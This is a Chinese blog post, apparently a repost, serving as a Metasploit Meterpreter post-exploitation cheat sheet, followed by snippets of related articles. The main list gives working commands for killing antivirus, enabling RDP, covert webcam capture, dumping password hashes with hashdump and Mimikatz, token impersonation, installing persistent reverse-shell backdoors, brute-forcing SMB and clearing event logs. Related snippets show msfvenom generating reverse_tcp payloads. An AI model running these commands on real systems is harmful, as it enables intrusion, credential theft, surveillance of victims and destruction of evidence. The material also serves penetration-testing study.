msf获取session后

最新推荐文章于 2024-07-10 12:09:21 发布
最新推荐文章于 2024-07-10 12:09:21 发布
阅读量493 收藏
点赞数
文章标签: git 安全 svn
原文链接:https://www.cnblogs.com/pangya/p/10096142.html
版权

进程迁移:
ps 获取进程
getpid shell的进程号
migrate 迁移
run post/windows/manage/migrate 自动迁移

shell之后:
sysinfo 获取系统信息
run post/windows/gather/checkvm 查看目标是否允许在虚拟机
idletime 最近运行的时间
route 查看目录完整网络
getuid 当前用户名
run post/windows/manage/killav 关闭杀毒软件
run post/windows/manage/enable_rdp 开启3389
run post/windows/manage/autoroute 目标子网情况
background 隐藏后台
route add 添加路由
route print查看
run post/windows/gather/enum_logged_on_users 列举当前有多少用户登录过目标主机
run post/windows/gather/enum_applocations 列举安装在目标主机上
run post/windows/gather/credentials/windows_autologin 抓取自动登录的用户名密码
load espia screengrad 抓取此时屏幕截图
webcam_list 有无摄像头
webcam_snap 拍照
webcam_stream 开启直播模式
shell 进入目标shell
文件系统命令:
pwd或getwd 目标主机当前处于哪个目录
getlwd 自己处于哪个目录
search -f *.txt -d c:\ 搜索c盘下所有txt文件
download c:\test.txt /root 下载到本机
upload /root/text.txt c: 上传

权限提升:
whoami/groups 查看当前权限
getuid 查看当前权限
getsystem 尝试提权
systeminfo 查看补丁
使用wmic 列出安装的补丁
令牌窃取:
use incognito
list_token -u 列出token
impersonate_token +上述列出的有效令牌 假冒令牌攻击(需要两个\)
成功后运行shell

Hash攻击:
1.使用hashdump 抓取密码
非SYSTEM运行时会失败
run windows/gather/smart_hashdump 导出域所有用户(windows7.开启UAC会导致失败)
2.Quarks PwDump
3.windows credentials Editor(WCE)
上传wce到目标。找到文件 wce -w
4.Mimikatz(管理员)
load Mimikatz 加载
msv 抓取Hash
kerberos 抓取系统票据
wdigest 获取系统账户信息
mimikatz_command -f samdump::hashed 抓取hash
mimikatz_command -f handle::list 查看进程
mimikatz_command -f service::list windows 服务
mimikatz_command -f crypto::listProviders 查看系统证书
支持PowerShell调用(Invoke-Mimikatz)

后门:
1.Cymothoa:
cymothoa -p 982 -s 1 -y 4444 选择PID为982的进程为宿主进程,使用第一类Shellcode,指定反弹端口4444
nc -nvv 目标主机 4444 使用nc进行连接
2.Persistence:
run persistence -A -S -U -i 60 -p 4321 -r 目标主机
A :自动启动payload程序
S :系统启动时自动加载
U :用户登录时自动启动
X :开机时自动加载
i :回连的时间间隔
P :监听反向连接端口号
r :目标主机
Web 后门:
msf中使用generate生成

内网渗透:
信息收集:
net user /domain : 查看域用户
net view /domain : 查看有几个域
net view /domain :xxx 查看域内主机
net group /domain : 查看域里面的组
net group “domain computers” /domain 查看域内所有的主机名
net group "domain admins " /domain 查看域管理员
net group “domain controllers” /domain 查看域控制器
net group “enterprise admins” /domain 查看企业管理器
nettime /domain 查看时间服务器

PowerShell 寻找域管在线服务
获取域管理权
登录域控制:使用msf中的PsExec 反弹Meterpreter

SMB爆破内网:
先添加路由
然后使用smb_login 或psexec_scanner
route add
creds

清理日志:
删除所有用户
clearev 删除日志

北极之北.
关注
msf+cobaltstrike联动(一):把msfsession发给cobaltstrike
逗比大师的博客
08-04 615
前提:MFS已经获取session,可以进入metepreter,现在需要使用cobaltstrike进行图形化管理或团队协作。 cobaltstrike起一个beacon监听,如使用:windows/beacon_http/reverse_http 设置好host和port之后启动监听。 MSF中使用 use exploit/windows/local/payload_inject...
Metasploit(一)--Meterpreter的命令速查表
weixin_34167819的博客
08-27 880
原文:http://www.2cto.com/Article/201311/259669.html第1步:核心命令? – 帮助菜单background – 将当前会话移动到背景bgkill – 杀死一个背景 meterpreter 脚本bglist – 提供所有正在运行的后台脚本的列表bgrun – 作为一个后台线程运行脚本channel – 显示活动频道close – 关闭...
msf 获取一个普通的session 控制windows
weixin_44286136的博客
05-19 2709
msf 获取session 在kali终端中打开msfconsole控制台 开启监听 use exploit/multi/handler 设置tcp监听 set payload windows/meterpreter/reverse_tcp 再次开启一个终端进行(shift+ctrl+T),查看本机ip 利用msfvenom制作木马程序 说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell -e 编码方式 -i 编码次数 -b 在生成的程序
【内网渗透】MSF后渗透阶段常用操作笔记
最新发布
uuzeray的博客
07-10 829
1、先看下目标靶机已存在用户 meterpreter中输入:run post/windows/gather/enum_logged_on_users。6 获取到meterpreter后 我们在终端内 输入getuid 看实际还没有提权成功 需要在还终端内在输入 getsystem 获取权限。那我们使用:use exploit/windows/local/bypassuac_windows_store_reg 尝试提权。启动远程桌面协议:run post/windows/manage/enable_rdp。
MSFsessions命令使用
qq_44624916的博客
11-28 5639
MSF使用
msf学习笔记
qq_48257021的博客
12-20 1128
SMB(服务器消息快):TCP445、NBT间接用TCP139接收数据,MS10-012、MS10-054 MSRPC(微软远程过程调用):TCP139、445,MS05-039、MS09-026、-e, –encoder [encoder] 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload。-t exe -x /root/正常.exe -o 1213.exe -e x86/shikata_ga_nai -k -c 20。
MSF建立webshell后门,并监听端口建立session连接
土拨鼠挖洞中的博客
06-23 1万+
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
msf内网提权
dreamthe的博客
11-22 2381
目录 1.利用木马文件拿到shell 2.利用ms_2018_8120提权 3.提高程序运行级别。 4.基于ms16_016提权 5.基于ms14_058提权 ​6.基于ms13_053提权 7.uac绕过 8.基于ms16_032提权 1.利用木马文件拿到shell 这里呢我们就不多说了,在上一篇文章里面我进行详细说明和演示。如果有不懂的朋友可以看上一篇的文章,上一篇文章:利用msfvenom生成木马文件反弹shell、meterpreter 简单系统命令_dreamthe的...
MSF后渗透
wo41ge的博客
11-24 3746
信息收集 获取目标机器的分区情况: post/windwos/gather/forensics/enum_drives 判断是否为虚拟机 post/windows/gather/checkvm 开启了哪些服务 :post/windwos/gather/enum_services 安装了哪些应用: post/windows/gather/enum_applications 查看共享: post/windows/gather/enum_shares 获取主机最近的系统操作: post/windows/gathe
Metasploit基本使用及常见漏洞复现
BeatRex的博客
09-20 1549
一、数据库配置 第一次打开msf的时候会报错,显示无法连接数据库等错误信息,所以需要配置下数据库postgresql 步骤: 开启postgresql服务service postgresql start,然后查看下postgresql数据库的状态service postgresql status显示已经开启成功; 创建和初始化msf数据库msfdb init; 启动msfmsfconsol...
msf 获取session 之后
weixin_30460489的博客
12-10 1790
进程迁移: ps 获取进程 getpid shell的进程号 migrate 迁移 run post/windows/manage/migrate 自动迁移 shell之后: sysinfo 获取系统信息 run post/windows/gather/checkvm 查看目标是否允许在虚拟机 ...
msf基本使用(小白必看)
m0_55177391的博客
10-19 442
msf基本使用
【Metasploit】MSF常用命令
m0_62783065的博客
02-06 1942
【Metasploit】MSF常用命令
后渗透通过msfconsole获取一个普通的session
bring_coco的博客
11-05 4267
最近在学后渗透,首先实验一下获取普通session 虚拟机实验环境:1.kali 2.win7 实验步骤: 1.在kali终端中打开msfconsole控制台 2.进入侦听模块 3.再次开启一个终端进行(shift+ctrl+T),查看本机ip 4.利用msfvenom制作木马程序 说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell -e 编码方式 -i 编码次数 -b 在生成的程序中避免出现的值 -f exe 生成exe格式 说明:
metasploit的session操作
热门推荐
天元喜羊羊的博客
04-25 1万+
msf > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- -
metasploit获取shell之后进一步利用!metasploit+sessions
weixin_34060741的博客
11-30 1309
当你用metasploit成功的***一台Windows主机后,你会获得一个Meterpreter 的Shell,今天我就会给大家讲一讲Meterpreter 获取shell以后的运用 当你看到了 [*] Meterpreter session 1 opened (192.168.195.140:4444 -> 192.168.195.139:1051) 这就代...
MSF中meterpreter和普通shell的区别
00勇士王子的博客
09-24 2347
使用wireshark流量分析证明MSF中meterprete和普通shell的区别
msf 指定session代理
06-06
如果你只想为单个会话设置代理,你可以使用 `setg Proxies` 命令来设置 `Session` 选项,如下所示: ``` setg Proxies http://127.0.0.1:8080 Session <session_id> ``` 其中 `<session_id>` 是你要设置代理的会话...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值